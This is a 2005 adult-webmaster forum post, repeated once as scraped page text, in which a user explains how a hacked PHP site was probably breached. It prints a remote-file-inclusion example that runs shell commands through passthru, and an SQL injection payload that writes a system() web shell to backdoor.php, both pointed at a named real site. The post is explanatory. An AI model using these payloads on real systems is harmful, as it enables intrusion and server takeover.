GoFuckYourself.com - Adult Webmaster Forum - View Single Post

V_RocKs · 08-02-2005, 02:45 AM

Put it back up and I'll tell ya how they did it...

Since you use PHP we will start with some basics...

Either 1, you use templates and they were able to use one of their own:

http://www.paulmarkham.com/all-adult....php?p=contact

Which in code is,

Code:

include($p);

Which means they:

http://www.paulmarkham.com/all-adult...php%3fcmd=Your Unix Command Here

In there file they included was:

Code:

if ($cmd != '') { passthru($cmd); }

Or you are not removing crap that can be sent to the DB so:

http://www.paulmarkham.com/all-adult....php?girl=sara

Becomes:

Code:

http://www.paulmarkham.com/all-adult-content.php?'<? system($cmd); ?>' INTO DUMPFILE '/path/to/website/backdoor.php'--

Of course that would be really simplistic since it would assume that your coder is a complete asshat.

Or it could just be that you have an unpatched version of awstats, phpbb or some other form of free software installed.

08-02-2005, 02:45 AM
V_RocKs Damn Right I Kiss Ass! Industry Role: Join Date: Dec 2003 Location: Cowtown, USA Posts: 32,428	Put it back up and I'll tell ya how they did it... Since you use PHP we will start with some basics... Either 1, you use templates and they were able to use one of their own: http://www.paulmarkham.com/all-adult....php?p=contact Which in code is, Code: include($p); Which means they: http://www.paulmarkham.com/all-adult...php%3fcmd=Your Unix Command Here In there file they included was: Code: if ($cmd != '') { passthru($cmd); } Or you are not removing crap that can be sent to the DB so: http://www.paulmarkham.com/all-adult....php?girl=sara Becomes: Code: http://www.paulmarkham.com/all-adult-content.php?'<? system($cmd); ?>' INTO DUMPFILE '/path/to/website/backdoor.php'-- Of course that would be really simplistic since it would assume that your coder is a complete asshat. Or it could just be that you have an unpatched version of awstats, phpbb or some other form of free software installed.